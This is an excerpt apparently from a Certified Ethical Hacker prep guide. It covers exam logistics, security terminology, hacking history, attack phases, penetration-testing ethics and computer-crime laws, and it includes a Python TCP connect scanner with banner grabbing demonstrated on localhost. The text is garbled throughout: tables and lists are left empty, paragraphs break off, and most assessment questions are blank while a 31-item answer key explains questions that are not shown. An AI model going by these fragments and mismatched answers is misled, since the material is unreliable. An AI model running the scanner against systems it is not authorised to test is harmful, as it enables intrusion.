Introduction
Overview
The EC-Council (www.eccouncil.org) Certified Ethical Hacker (CEH) certification is designed to qualify
skilled information system security professionals in performing ethical attacks against target
information systems to assist an organization in developing preemptive approaches against hackers.
A CEH understands the tools and methods used by malicious individuals against networks and
applies his or her skills to help organizations identify vulnerabilities in their systems.
The CEH Prep Guide prepares candidates for the CEH certification examination by providing in-depth
coverage of the latest hacking techniques required to pass the qualifying CEH 312-50 or EC0-350
examinations. The subject matter is presented in a concise, professional manner in an easy-to-understand format and includes review questions at the end of each chapter to test a candidate's
knowledge of the material. The included CD, with many hundreds of questions and answers, also
serves as a self-paced examination review and knowledge reinforcement tool.
In addition to technical content, the CEH Prep Guide emphasizes the legal and ethical requirements
associated with ethical hacking and the increased professional responsibility that goes along with the
CEH certification.
Because this book provides a focused presentation of the CEH material, it is extremely valuable to
professionals seeking to advance their careers, levels of competence, and recognition in the Ethical
Hacking and penetration testing field. The knowledge gained is applicable to commercial, industrial,
military, and government organizations.
The CEH certification also makes an individual a much-desired employee to an organization. This
professional brings the knowledge of security threats, penetration testing, vulnerability analysis, risk
mitigation, business-related issues, and countermeasures to an organization along with the means to
upgrade an organization's defenses in an effective and cost-efficient manner. The CEH has
knowledge of both offensive and defensive measures in order to protect an organization's information
systems.
Exam Eligibility
To sit for the CEH certification examination, a candidate must either attend a CEH course at
an EC-Council Accredited Training Center or prepare through self-study. In the self-study path, the
candidate must have at least two years of information system security experience endorsed by his or
her employer. If the candidate does not have two years of experience but has relevant educational
experience, he or she can submit a request to EC-Council for consideration on a case-by-case basis.
No matter which path the CEH candidate chooses, the CEH Prep Guide is a valuable tool for
acquiring the necessary knowledge to prepare for and pass the CEH exam. The clear and detailed
explanations of key ethical hacking topics along with the hundreds of review questions greatly
increase the candidates chances of success when taking the CEH examination.
The CEH Examination Application Form (EC0-350) can be downloaded from the EC-Council website
(www.eccouncil.org/CEH.htm), and the completed form should be faxed to the EC-Council at +1-212-202-3500 for verification. After verification, the candidate receives an eligibility voucher number that
can be used to register and schedule the test at any Authorized Prometric Testing Center globally. The
cost of the examination is USD 250.
EC-Council offers two examinations: Exam 312-50 and Exam EC0-350. Only students who have
undergone training at an EC-Council Accredited Training Center are eligible to sit for the Web-based Prometric Prime Exam 312-50. Self-study candidates are authorized to sit for the EC0-350
Exam at an Authorized Prometric Testing Center. Both exams cover the same material and lead to the
CEH certification.
The examination comprises 150 questions with a four hour time period in which to complete the exam.
The exam duration is four and one half hours for Non-English speaking countries. A score of 70
percent is required to pass the exam.
The CEH Exam can be retaken with no restrictions or waiting period, if necessary. The CEH
certification is valid for 2 years, and EC-Council Professional Education Credits (EPE) are required to
maintain the certification. A candidate who passes the examination receives a welcome kit within
eight weeks.
Additional information can be found at the EC-Council website.
The chapters in this text address the fundamentals of information system security; the rationale for
ethical hacking; relevant technologies and terminology; the legal ramifications of ethical hacking;
corresponding laws and regulations; types of attacks; and the steps involved in ethical hacking.
Terminology
The basic tenets of information system security are confidentiality, integrity, and availability,
sometimes known as the CIA triad. Confidentiality ensures that the information is not disclosed to
unauthorized persons or processes. Integrity is achieved by accomplishing the following three goals:
1. Preventing the modification of information by unauthorized users
2. Preventing the unauthorized or unintentional modification of information by authorized users
3. Preserving internal and external consistency:
a. Internal consistency refers to a logical connection among data in the system. For
example, assume that an internal database holds the number of units of a particular
item in each department of an organization. The sum of the number of units in each
department should equal the total number of units that the database has recorded
internally for the whole organization.
b. External consistency refers to a logical connection among objects in the real world and
their representations in the system. Using the example previously discussed in (a),
external consistency means that the number of items recorded in the database for each
department is equal to the number of items that physically exist in that department.
Availability ensures that a system's authorized users have timely and uninterrupted access to the
information in the system.
Additional factors that support information system security are:
When viewing an information system through the eyes of an ethical hacker, system threats,
vulnerabilities, risks, attacks, targets of evaluation, and exploits have to be taken into account. The
formal definitions of these terms are given as follows:
Threat. An event or activity that has the potential to cause harm to the information systems or
networks
Vulnerability. A weakness or lack of a safeguard that can be exploited by a threat, causing harm
to the information systems or networks; can exist in hardware, operating systems, firmware,
applications, and configuration files
Risk. The potential for harm or loss to an information system or network; the likelihood that a
threat will exploit a vulnerability, weighed against the impact if it does
Attack. An action against an information system or network that attempts to violate the system
security policy; usually the result of a threat realized
Hacktivism
Hackers and crackers have a variety of motivations and justifications for their activities. Some of these
individuals believe that information should be free and that they are doing their part in this cause. Hackers
who conduct their activities for a cause are said to be practicing hacktivism. Their targets are
organizations that they perceive as responsible for social injustice: government organizations
and agencies, international economic organizations, and any other entities that they define as being
responsible for social and economic inequities. Through their hacktivism, they gain publicity for their
cause and for themselves, which helps build their reputation. No matter what the justification, breaking into
computers and networks is illegal.
Threats
Threats from hackers can take on a variety of forms. The relevant threats are summarized in Table 1-1.
Table 1-1: Example Threats

THREAT                               DESCRIPTION
Information Warfare
Cyber Terrorism
Criminal
Violation of Data Integrity
Late or Delayed Processing
Acquiring High Sensitivity Data
Malware                              Viruses, Trojan horses, worms, and other software that cause harm to
                                     information systems
Denial or Interruption of Service
Personnel-Related
Environmental
Hacking History
Hacking began in the 1960s at MIT when students attempted to learn more about mainframe
computing systems and improve their skills. The telephone systems were tempting to phreakers, and
one John Draper, known as Captain Crunch, used a whistle packaged in Cap'n Crunch cereal to
generate a 2600 Hz tone that allowed access to the AT&T long distance network. This discovery led to
Draper and others designing and building a so-called blue box that generated the 2600 Hz signal
and other tones for use in making long distance phone calls without paying. Steve Jobs and Steve
Wozniak, who later founded Apple Computer, were also makers of blue boxes.
In the 1980s, hackers began to share information and stolen passwords on electronic computer
bulletin boards such as Sherwood Forest. Hacking clubs began to form with names like the German
Chaos Computer Club.
In 1982, teenagers in Milwaukee, Wisconsin (area code 414), known as the 414 Gang, launched attacks into the
Sloan-Kettering Cancer Center's medical records systems. Two years later, the hacker magazine
2600 made its debut under editor Eric Corley, aka Emmanuel Goldstein. In November 1988, the
Morris Internet Worm spread through the Internet and resulted in a large-scale Denial of Service
(DoS). The cause of this disruption was a small program written by Robert Tappan Morris, a 23-year-old doctoral student at Cornell University. The worm infected approximately 6,000 networked
computers.
In 1986, attacks were launched against U.S. classified computer systems by Germans affiliated with
the Chaos Computer Club and working for the KGB. This drama is described in the book The
Cuckoo's Egg, written by Clifford Stoll (Clifford Stoll, The Cuckoo's Egg, Doubleday, copyright 1989;
ISBN 0-385-24946-2). Stoll uncovered this activity after he noticed a 75-cent error in a computer
account at the Lawrence Berkeley Laboratory.
In 1990, a hacker named Kevin Poulsen, with some associates, seized control of a radio station's phone
system to ensure they won a call-in contest for Porsches and other prizes. Poulsen, who was also
wanted for phreaking, was apprehended and sentenced to five years in prison. He was released in
1996.
The hacking conference Def Con was first held in Las Vegas in 1993 and is still held there annually.
The notorious hacker Kevin Mitnick was arrested in 1995 for, among other crimes, attacks against
telephone systems. Mitnick had been convicted in 1989 for computer and access device fraud but eluded
police and the FBI for more than two years after violating the terms of his supervised release. On Christmas 1994, he broke
into the computers of Tsutomu Shimomura in San Diego, California. Shimomura tracked down Mitnick
after a cross-country electronic pursuit, and Mitnick was arrested by the FBI in Raleigh, North Carolina, on
February 15, 1995. Mitnick pleaded guilty to the charges in March 1999, and his sentence was
nearly equal to his time served. He is now an independent information security consultant and author.
In 1994, Russian hacker Vladimir Levin and associates performed electronic transfers of about $10
million from Citibank accounts to a number of international banks. Levin was arrested in London in 1995, extradited and tried in the U.S., and sentenced to
three years confinement. In 1998, the Cult of the Dead Cow announced and released very effective
Trojan horse software called Back Orifice at Def Con. Back Orifice provided remote access to
Windows 98 and Windows 95 computers.
In February 2000, hackers launched Distributed DoS attacks against Yahoo!, Amazon.com, and
ZDNet. Microsoft Corporations network was hacked in October 2000 by an attacker who gained
access to software under development.
Reconnaissance
Reconnaissance is a preliminary activity in which an attacker attempts to gather information about a
target preparatory to launching an attack. It includes scanning the network from the inside or outside
without the authority to do so. In this phase, the risk to the organization is classified as notable
because it is an early attempt to gather information about the network and information systems.
Reconnaissance can either be passive or active. Passive reconnaissance is accomplished by
monitoring the network using sniffers or other mechanisms to acquire information about the network
and IT systems. The hacker can also use other means, such as dumpster diving, to acquire
information, which involves searching through an organization's or person's discarded material.
Conversely, active reconnaissance probes the network to acquire information about the operating
systems being used, available services, open ports, routers, and hosts.
Scanning
Scanning is the activity that precedes the actual attack and involves acquiring more detailed
information based on the data obtained during the reconnaissance phase. Some of the tools used in
the scanning phase include vulnerability scanners, port scanners, and war dialers. Using these tools,
the hacker might be able to acquire information concerning user accounts, possible entry points, and
possible security mechanisms such as intrusion detection systems. They can also inspect registry
entries in operating systems to determine whether particular patches have been installed. Obtaining
this information is sometimes known as enumeration.
Examples of security scanning tools are Nmap and Nessus. Nmap can be used to identify network
computers and operating systems, enumerate open ports on potential target computers, determine
applications and versions running on potential target computers, and determine the general security
posture of a network.
The Nessus security scanner provides the capability to detect local flaws, uninstalled patches, and
weaknesses in network hosts. Nessus maintains a database of recent security vulnerabilities updated
on a daily basis.
The risk to the organization or business is considered high in the scanning phase because it enables
access to the network and consequent harmful activities. The risk can be reduced by disabling every
service and closing every port that is not needed on the network computers, so that only what is explicitly
required is reachable. This practice is called deny all (a default-deny policy).
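The connect scan and banner grab that Nmap automates can be shown in a few dozen lines. The following Python script is an added example written for this guide's discussion of scanning and enumeration; it is not the book's code and not Nmap's. It starts a constructed local listener that announces an SSH-style banner (an assumption standing in for a real daemon), performs a TCP connect scan of that port and of a deliberately closed one, grabs whatever each open port says, and matches the banner against a small signature table that is likewise an assumption, not Nmap's nmap-service-probes database. The states it reports follow the usual scanner vocabulary: a completed handshake is open, an immediate reset is closed, and a timeout is filtered.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed banner-prefix table (an assumption for this example, not Nmap's
# real nmap-service-probes database): maps what a service says on connect to a name.
SIGNATURES = (
    ("SSH-", "ssh"),
    ("220 ", "smtp-or-ftp"),
    ("HTTP/", "http"),
)


def identify_service(banner):
    """Map a banner to a service name by prefix; 'unknown' when nothing matches."""
    for prefix, name in SIGNATURES:
        if banner.startswith(prefix):
            return name
    return "unknown"


def grab_banner(sock, max_bytes=128, timeout=1.0):
    """Read whatever the service volunteers right after connect (may be nothing)."""
    sock.settimeout(timeout)
    try:
        data = sock.recv(max_bytes)
    except (socket.timeout, OSError):
        return ""
    return data.decode("ascii", errors="replace").strip()


def probe_port(host, port, timeout=0.5):
    """TCP connect scan of a single port. Returns (port, state, banner).

    A completed handshake means open; an immediate RST (ConnectionRefusedError)
    means closed; a timeout means filtered (something dropped the SYN).
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return port, "open", grab_banner(s)
    except ConnectionRefusedError:
        return port, "closed", ""
    except (socket.timeout, OSError):
        return port, "filtered", ""


def connect_scan(host, ports, workers=32):
    """Scan the given ports in parallel; results are sorted by port number."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(pool.map(lambda p: probe_port(host, p), ports))


def start_fake_service(banner, host="127.0.0.1"):
    """Constructed stand-in for a real daemon: listens on a kernel-chosen port,
    sends `banner` to every client, then closes. Returns the listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener was closed; stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv


def unused_port(host="127.0.0.1"):
    """Ask the kernel for a free port, then release it so nothing listens there."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    svc = start_fake_service(b"SSH-2.0-OpenSSH_8.9\r\n")
    open_port = svc.getsockname()[1]
    for port, state, banner in connect_scan("127.0.0.1", [open_port, unused_port()]):
        print(f"{port}/tcp {state:8s} {identify_service(banner):12s} {banner}")
    svc.close()
```

Run it as-is to scan the loopback interface; point connect_scan() at a host and port list you are authorized to test. A connect scan completes the full three-way handshake, so the target service sees and may log the connection; it is noisier than the half-open SYN scan Nmap uses by default when it has raw-socket privileges.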
Acquiring Access
The Acquiring Access phase is where the actual attack is implemented; therefore, the business risk is
designated at the highest level. During this phase, the attacker accesses the operating system and
network and can launch denial of service attacks, buffer overflow attacks, and application-based
attacks. In addition, the attacker can insert viruses and Trojan horses and can engage in other types
of malicious behavior.
Another goal of the attacker in the Acquiring Access phase is to obtain system privileges not normally
available to the conventional user. With these elevated or escalated privileges, a hacker can execute
commands and access parts of the systems and networks reserved for individuals such as system
administrators.
Maintaining Access
Once the hacker has acquired access to the network and associated computers, he or she wants to
maintain that access. Typical activities involved in maintaining access include downloading password
files that can be used to reenter the system at a later time, installing software such as Trojan horses
and rootkits, and installing sniffers and keyloggers to capture network traffic and user keystrokes. A Trojan horse is code hidden as part
of a legitimate and useful program. When the legitimate program is executed, the Trojan horse
software runs, unbeknownst to the user, and can carry out malicious behavior. A rootkit is
software that gives an attacker continued privileged access to a host or network while concealing its own
presence and the attacker's activity from the system's administrators and security tools.
To maintain ownership of the compromised system, an attacker might repair the vulnerability that
allowed him or her to gain access to the networks and hosts in the first place, in order to prevent other
hackers from successfully attacking the same IT elements.
Entities that perform ethical hacking functions for organizations usually fall into one of three
categories: white hats, former black hats, and independent consulting organizations. The white hat
ethical hacker has the appropriate computer skills and understanding of the black hat hacker mentality
and methods. This person might be an independent consultant hired to perform ethical hacking
activities. The former black hat hacker is, we might hope, reformed and brings actual black hat
experience to his or her work. There is a concern about this individual in that you can never be certain
that he or she will not revert to their former malicious activities. The third category of ethical hacker is
taken by consulting companies that perform a variety of services for organizations including
accounting, auditing, and information system security.
Full knowledge (Whitebox) test. The team has as much knowledge as possible about the
network and computing resources to be evaluated.
Partial knowledge (Graybox) test. The testing team has knowledge that might be relevant to a
specific type of attack by a person internal to the organization. It determines which areas and
resources might be accessible and available to an insider.
Zero knowledge (Blackbox) test. The testing team is provided with no information and begins
the testing by gathering information on its own initiative. This type of test simulates attacks
perpetrated by outsiders. Because the ethical hacking team has to begin from scratch to gather
knowledge about the target information system, this type of test usually takes longer to execute
and, consequently, costs more to implement.
The Institute for Security and Open Methodologies (www.isecom.org/) has developed an Open Source
Security Testing Methodology Manual (OSSTMM) (www.osstmm.org) that provides guidance and
metrics for conducting security tests. It has test cases that are divided into five channels (sections)
which collectively test: information and data controls, personnel security awareness levels, fraud and
social engineering control levels, computer and telecommunications networks, wireless devices,
mobile devices, physical security access controls, security processes, and physical locations such as
buildings, perimeters, and military bases. The manual is applicable to ethical hacking, penetration
tests, vulnerability, and other types of security assessments.
Protect information uncovered during the penetration test. In the course of gaining access to
an organization's networks and computing resources, the ethical hacker will find that he or she
has access to sensitive information that would be valuable to the organization's competitors or
enemies. Therefore, this information should be protected to the highest degree possible and not
divulged to anyone, either purposely or inadvertently.
Conduct business in an ethical manner. Ethics is a relative term and is a function of a number
of variables, including background, religion, ethnicity, upbringing, and so on. However, the ethical
hacker should conduct his or her activities in an ethical fashion and in the best interest of the
organization that commissioned the penetration testing. Similarly, the organization should treat
the ethical hacker with the same respect and ethical conduct.
Limitation of liability. As discussed earlier in this section, during a penetration test, the ethical
hacking team will most likely have access to sensitive files and information. The ethical hacker is
trained not to cause any harm, such as modifying files, deleting information, and so on, in the
course of his or her activities. But, since errors do occur, the organization and ethical hacker
should have terms in the contract that address the situation where harm is done inadvertently.
There should be a limitation to the liability of the ethical hacker if this scenario occurs. Another
option commonly used by consultants is to obtain an insurance policy that covers the
consultant's activities in his or her chosen profession.
Remain within the scope of the assignment. The scope of the penetration testing should be
delineated beforehand and agreed upon by all parties involved. With that accomplished, the
testing team should conduct the testing strictly within those bounds. For example, only the
networks and computing resources specified should come under penetration testing, and only
the agreed methods and extent of trying to break in to the information system should be used.
Develop a testing plan. As with any endeavor, the ethical hacking team should develop a test
plan in advance of the testing and have it approved by the hiring organization. The plan should
include the scope of the test, resources to be tested, support provided by the hiring organization,
times for the testing, location of the testing, the type of testing (Whitebox, Graybox, or Blackbox),
extent of the penetration, individuals to contact in the event of problems, and deliverables.
Comply with relevant laws and regulations. Business organizations are required to comply
with a variety of laws and regulations, including the Health Insurance Portability and
Accountability Act (HIPAA), Sarbanes-Oxley, and the Gramm-Leach-Bliley Act (GLBA). These
acts are one of the reasons that companies hire ethical hackers, since the testing demonstrates that they are
acting to protect their information resources. Penetration testers also have to make sure that they
comply with the appropriate laws
against the computer, crimes using the computer, and crimes in which the computer is incidental. The
following is a general listing of the most prominent types of computer crimes related to hacking:
Social engineering. Using social skills to obtain information, such as passwords or PINs,
to be used in an attack against computer-based systems
Fraud. Using computers or the Internet to commit crimes (for example, by not delivering goods
paid for by a customer)
Dumpster diving. Obtaining information that has been discarded as garbage in dumpsters or at
recycling locations
Malicious code. Programs (such as viruses, Trojan horses, and worms) that, when activated,
cause harm to information systems
Spoofing of IP addresses. Inserting a false IP address into a message to disguise the original
location of the message or to impersonate an authorized source
Embezzlement. Illegally acquiring funds, usually through the manipulation and falsification of
financial statements
Use of readily available attack scripts on the Internet. Scripts that have been developed by
others and are readily available through the Internet, which can be employed by unskilled
individuals to launch attacks on networks and computing resources
A problem with prosecuting hackers that have violated the law is that many jurisdictions around the
world have different and inconsistent laws relating to computer crime. For example, a hacker might be
launching attacks against U.S. government agencies from Russia.
Some of the international organizations addressing computer crime are the United Nations, Interpol,
the European Union, and the G8 leading industrial nations.
Because of the high rate of development of new technologies, laws usually lag behind. In order to
address computer crime, law enforcement can use traditional laws against embezzlement, fraud,
DoS, and wiretapping to prosecute computer criminals.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2. Which of the following items is not a description of the best way to apply ethical hacking as
a defensive tool?
a. Before an attack
b. To uncover vulnerabilities
c. To provide a basis for remediation
d. After an attack to evaluate damage
3.
4.
5.
6.
7.
8.
b. Evaluation system
c. Target element
d. Target of evaluation
9. Hackers who conduct their activities for a cause are said to be practicing:
a. Causation
b. Hacktivism
c. Protesting
d. Hacking conscience
1. Answer: a
2. Answer: d
3. Answer: a
4. Answer: b
5. Answer: d
Answer a is a vulnerability; answer b is risk; answer c is an attack.
6. Answer: a
7. Answer: c
Answer a is a script kiddie, b is a whacker, and d is a cyber-terrorist.
8. Answer: d
9. Answer: b
10. Answer: c
Answer a is a criminal threat, b is late or delayed processing, and d is a violation of data integrity.
11. Answer: a
12. Answer: b
13. Answer: d
14. Answer: c
15. Answer: b
Answer b describes a cracker or malicious hacker.
16. Answer: a
17. Answer: d
18. Answer: a
19. Answer: c
20. Answer: a
21. Answer: d
Answer a is not a phase of malicious hacking; the other answers are phases in malicious hacking.
22. Answer: b
23. Answer: a
24. Answer: c
25. Answer: d
The activities in answer d are usually performed in the maintaining access phase so that the
hacker can reenter the system at a later time.
26. Answer: d
27. Answer: b
28. Answer: c
Answer a, gray hat, is a hacker who, at times, will not break the law and, in fact, might help to
defend a network. At other times, the gray hat hacker reverts to black hat activities. Answer b, the
white hat hacker, has exceptional computer skills and uses his or her abilities to increase the
security posture of information systems and defend them from malicious attacks. Answer d is a
made-up distracter.
29. Answer: a
30. Answer: b
31. Answer: a
Administrative Law
Administrative laws are categorized by subject matter in administrative codes or chronologically in
administrative registers. At the federal level, these categorizations are respectively called the Code of
Federal Regulations (C.F.R.) and the Federal Register (Fed. Reg.). A citation to the Code of Federal
Regulations comprises the following elements:
The number of the C.F.R. title
The abbreviation for the Code (C.F.R.)
The section number
The year of publication
For example, the reference 10 C.F.R. 100.4 (1998) points to Section 100.4 in Title 10 of the 1998
edition of the Code of Federal Regulations.
Statutory Law
In the U.S., statutory laws are arranged as statutory codes, which are organized according to subject
matter, or session laws, which are arranged in order of enactment. Statutory codes are held in the
United States Code (U.S.C.), and session laws are found in the Statutes at Large (Stat.). State
statutory laws are also subdivided according to these headings.
Federal statutes cite the United States Code, and this citation includes:
The Code title number (each title is a grouping of statutes dealing with a particular subject matter)
The abbreviation for the code (U.S.C.)
The statutory section number within the title
The date of the edition or supplement
For example, 18 U.S.C. 1000 (1998) refers to Section 1000 in Title 18 of the 1998 edition of the
United States Code. Title 18 of the United States Code covers Crimes and Criminal Procedure.
Other titles are as follows:
Title 11. Bankruptcy
Title 12. Banks and Banking
Title 15. Commerce and Trade
Title 17. Copyrights
Title 26. Internal Revenue Code
Title 31. Money and Finance
Title 42. The Public Health and Welfare
Title 49. Transportation
Civil (tort) law. These laws address damage or loss to an individual or an organization.
Punishment cannot include imprisonment, but consists of financial awards comprising punitive,
compensatory, and statutory damages.
Criminal law. These laws cover individual actions that violate government laws put in place to
protect the public. Punishment can consist of imprisonment or financial penalties.
Whether the offense was committed for purposes of commercial advantage or private financial
benefit
Whether the defendant acted with malicious intent to cause harm in committing the offense
The extent to which the offense violated the privacy rights of individuals harmed
Whether the offense involved a computer used by the government in furtherance of national
defense, national security, or the administration of justice
Whether the violation interfered with or disrupted a critical infrastructure, or whether it was
intended to have this effect
Whether the violation created a threat to public health or safety or injury to any person or whether
it was intended to have this effect
1970 U.S. Racketeer Influenced and Corrupt Organizations (RICO) Act. Provides both
criminal penalties and civil remedies for racketeering activity that influences the operation of legitimate businesses;
predicate crimes cited in this act include mail fraud, securities fraud, and the use of a computer to
perpetrate fraud.
1974 U.S. Federal Privacy Act (amended in 1980). Applies to federal agencies; provides for the
protection of information about private individuals that is held in federal databases, and grants
access by the individual to these databases. The law imposes civil and criminal penalties for
violations of the provisions of the Act.
1978 Foreign Intelligence Surveillance Act (FISA). FISA can be used to conduct electronic
surveillance and physical searches under a court order and without a warrant in cases of
international terrorism, spying, or sabotage activities that are conducted by a foreign power or its
agent. FISA is not intended for use in prosecuting U.S. citizens.
1984 U.S. Medical Computer Crime Act. Addresses illegal access or alteration of computerized
medical records through phone or data networks.
1984 (strengthened in 1986 and 1994) First U.S. Federal Computer Crime Law Passed.
Covers classified defense or foreign relations information, records of financial institutions or credit
reporting agencies, and government computers. Unauthorized access or access in excess of
authorization became a felony for classified information and a misdemeanor for financial
information. This law made it a misdemeanor to knowingly access a U.S. Government computer
without or beyond authorization if the U.S. government's use of the computer would be affected.
1986 (amended in 1996) U.S. Computer Fraud and Abuse Act. Clarified the 1984 law and added
three new crimes:
1. When use of a federal interest computer furthers an intended fraud
2. When altering, damaging, or destroying information in a federal interest computer or
preventing the use of the computer or information causes a loss of $1,000 or more or
could impair medical treatment
3. When trafficking in computer passwords or similar access information with intent to defraud
1987 U.S. Computer Security Act. Places requirements on federal government agencies to
conduct security-related training, to identify sensitive systems, and to develop a security plan for
those sensitive systems. A category of sensitive information called Sensitive But Unclassified
(SBU) has to be considered. This category, formerly called Sensitive Unclassified Information
(SUI), pertains to information below the government's classified level that is important enough to
protect, such as medical information, financial information, and research and development
knowledge. This act also partitioned the government's responsibility for security between the
National Institute of Standards and Technology (NIST) and the National Security Agency (NSA).
NIST was given responsibility for information security in general, primarily for the commercial and
SBU arenas, and NSA retained the responsibility for cryptography for classified government and
military applications.
The Computer Security Act established the National Computer System Security and Privacy
Advisory Board (CSSPAB), which is a 12-member advisory group of experts in computer and
telecommunications systems security.
1990 United Kingdom Computer Misuse Act. Defines computer-related criminal offenses.
1991 U.S. Federal Sentencing Guidelines. Provides punishment guidelines for those found
guilty of breaking federal law. These guidelines are as follows:
1. Treat the unauthorized possession of information without the intent to profit from the
information as a crime.
2. Address both individuals and organizations.
3. Make the degree of punishment a function of the extent to which the organization has
demonstrated due diligence (due care or reasonable care) in establishing a prevention
and detection program.
4. Invoke the prudent man rule that requires senior officials to perform their duties with the
care that ordinary, prudent people would exercise under similar circumstances.
5. Place responsibility on senior organizational management for the prevention and detection
programs, with fines of up to $290 million for nonperformance.
1992 OECD Guidelines to Serve as a Total Security Framework. The Framework includes
laws, policies, technical and administrative measures, and education.
1994 U.S. Communications Assistance for Law Enforcement Act. Requires all
communications carriers to make wiretaps possible.
1994 U.S. Computer Abuse Amendments Act. This act accomplished the following:
1. Changed the federal interest computer to a computer used in interstate commerce or
communications
2. Covered viruses and worms
3. Included intentional damage as well as damage done with reckless disregard of
substantial and unjustifiable risk
4. Limited imprisonment for the unintentional damage to one year
5. Provided for civil action to obtain compensatory damages or other relief
Paperwork Reduction Acts of 1980, 1995. The 1980 act, as amended in 1995, provides Information
Resources Management (IRM) directives for the U.S. Government. This law established the
Office of Information and Regulatory Affairs (OIRA) in the Office of Management and Budget
(OMB). One result of the Act is to require government agencies to apply information technology
systems to increase productivity, improve delivery of services, and minimize waste. The OMB
was assigned the responsibility for improving government efficiency through the application of
new technologies and was also made responsible for developing guidance on information
security for government agencies.
1995 Council Directive (Law) on Data Protection for the European Union (EU). Declares that
each EU nation is to enact protections similar to those of the OECD Guidelines.
1996 U.S. Economic and Protection of Proprietary Information Act. Addresses industrial and
corporate espionage and extends the definition of property to include proprietary economic
information in order to cover the theft of this information.
1996 U.S. National Information Infrastructure Protection Act. Enacted in October 1996 as
part of Public Law 104-294, it amended the Computer Fraud and Abuse Act, which is codified at
18 U.S.C. 1030. The amended Computer Fraud and Abuse Act is patterned after the OECD
Guidelines for the Security of Information Systems and addresses the protection of the
confidentiality, integrity, and availability of data and systems. This path is intended to encourage
other countries to adopt a similar framework, thus creating a more uniform approach to
addressing computer crime in the existing global information infrastructure.
1996 Information Technology Management Reform Act (ITMRA) of 1996, National Defense
Authorization Act for Fiscal Year 1996 (Clinger-Cohen Act). ITMRA is also known as the
Clinger-Cohen Act. This legislation relieves the General Services Administration of responsibility
for procurement of automated systems and contract appeals. OMB is charged with providing
guidance, policy, and control for information technology procurement. With the Paperwork
Reduction Act, as amended, this Act delineates OMB's responsibilities for overseeing agency
practices regarding information privacy and security.
1996, Title I, Economic Espionage Act. The Economic Espionage Act addresses the numerous
acts concerned with economic espionage and the national security aspects of the crime. The
theft of trade secrets is also defined in the Act as a federal crime.
1998 U.S. Digital Millennium Copyright Act (DMCA). The DMCA prohibits trading,
manufacturing, or selling in any way intended to bypass copyright protection mechanisms. It also
addresses ISPs that unknowingly support the posting of copyrighted material by subscribers. If
the ISP is notified that the material is copyrighted, the ISP must remove the material. Additionally,
if the posting party proves that the removed material was of lawful use, the ISP must restore the
material and notify the copyright owner within 14 business days.
2000 U.S. Congress Electronic Signatures in Global and National Commerce Act (ESIGN).
ESIGN facilitates the use of electronic records and signatures in interstate and foreign commerce
by ensuring the validity and legal effect of contracts entered into electronically. An important
provision of the act requires that businesses obtain electronic consent or confirmation from
consumers to receive information electronically that a law normally requires to be in writing. The
legislation is intent on preserving the consumer's rights under consumer protection laws and went
to extraordinary measures to meet this goal. Thus, a business must receive confirmation from the
consumer in electronic format that the consumer consents to receiving information electronically
that used to be in written form. This provision ensures that the consumer has access to the
Internet and is familiar with the basics of electronic communications.
USA Provide Appropriate Tools Required to Intercept and Obstruct Terrorism (PATRIOT)
Act. This act gives the U.S. government new powers to subpoena electronic records and to
monitor Internet traffic. In monitoring information, the government can require the assistance of
ISPs and network operators. This monitoring can extend even into individual organizations. In the
Patriot Act, Congress permits investigators to gather information about email without having to
show probable cause that the person to be monitored has committed a crime or was intending to
commit a crime. Routers, servers, backups, and so on now fall under existing search and seizure
laws. A new twist is delayed notification of a search warrant. Under the Patriot Act, if it is
suspected that notification of a search warrant would cause a suspect to flee, a search can be
conducted before notification of a search warrant is given. Specifically, this act permits:
1. The subpoena of electronic records
2. The monitoring of Internet communications
3. The search and seizure of information on live systems (including routers and servers),
backups, and archives
Generally Accepted Systems Security Principles (GASSP). These items are not laws but are
accepted principles that have a foundation in the OECD Guidelines:
1. Computer security supports the mission of the organization.
2. Computer security is an integral element of sound management.
3. Computer security should be cost-effective.
4. Systems owners have security responsibilities outside their organizations.
5. Computer security responsibilities and accountability should be made explicit.
6. Computer security requires a comprehensive and integrated approach.
7. Computer security should be periodically reassessed.
8. Computer security is constrained by societal factors.
2002 E-Government Act. Title III, the Federal Information Security Management Act
(FISMA). This Act was written to:
1. Provide a comprehensive framework for ensuring the effectiveness of information security
controls over information resources that support Federal operations and assets
2. Recognize the highly networked nature of the current Federal computing environment and
provide effective government-wide management and oversight of the related information
security risks, including coordination of information security efforts throughout the civilian,
national security, and law enforcement communities
3. Provide for development and maintenance of minimum controls required to protect
Federal information and information systems
4. Provide a mechanism for improved oversight of Federal agency information security
programs
There must be a way for a person to find out what information about them is in a record and
how it is used.
Any organization creating, maintaining, using, or disseminating records of identifiable
personal data must ensure the reliability of the data for their intended use and must take
precautions to prevent misuses of that data.
Ethics
Ethics is concerned with standards of behavior and considerations of what is right and what is
wrong. It is difficult to state hard ethical rules because definitions of ethical behavior are a function of
an individual's experience, background, nationality, religious beliefs, culture, family values, and so on.
Ethical computing should incorporate ethical norms. Furthermore, if an individual is a certified
professional in ethical computing or information systems security, that individual is required to adhere
to higher ethical and legal standards than noncertified personnel.
Hackers sometimes justify their attacks on computers with the following rationale:
By writing viruses, I am exercising freedom of speech.
By penetrating other information systems, I am increasing my knowledge.
Information wants to be free, and I am helping in that mission.
Information system software should prevent me from inflicting harm.
Computer files should always be backed up, so files that I might damage can be retrieved.
Because manufacturers make most software easy to copy, it is OK for me to copy it and use
unlicensed software.
A variety of professional and certifying organizations involving information systems have developed
their own codes of ethics. Some examples of these codes are given in the following list:
The EC-Council Code of Ethics
Keep private any confidential information gained in her/his
professional work (in particular, as it pertains to client lists and client personal information). Not
collect, give, sell, or transfer any personal information (such as name, e-mail address, Social
Security number, or other unique identifier) to a third party without client prior consent.
Protect the intellectual property of others by relying on her/his own innovation and efforts, thus
ensuring that all benefits vest with its originator.
Disclose to appropriate persons or authorities potential dangers to any e-commerce clients, the
Internet community, or the public, that she/he reasonably believes to be associated with a
particular set or type of electronic transactions or related software or hardware.
Provide service in their areas of competence, being honest and forthright about any limitations of
